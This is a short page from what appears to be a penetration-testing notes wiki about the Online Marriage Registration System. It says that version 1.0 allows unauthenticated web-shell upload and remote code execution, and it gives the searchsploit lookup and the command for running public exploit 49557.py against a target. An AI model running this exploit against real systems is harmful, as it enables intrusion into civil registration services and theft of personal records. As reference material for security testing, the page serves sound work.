OMRS

101

The Online Marriage Registration System (OMRS) is a web-based application designed to simplify and digitize the marriage registration process. It allows users to submit applications, upload documents, and track status online. Typically used by local government or civil service departments.

Attacks

OMRS 1.0 allows unauthenticated users to register, upload a PHP web shell, and achieve RCE: Exploit (49557.py):

# Search for a PoC
$ searchsploit OMRS
Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3) | php/webapps/49557.py

# Exploit
$ python3 49557.py -u http://172.16.1.10:80/ -c 'whoami'

PreviousMantis BT NextOnline Discussion Forum

Last updated 7 months ago

hashtag101

hashtagAttacks

101

Attacks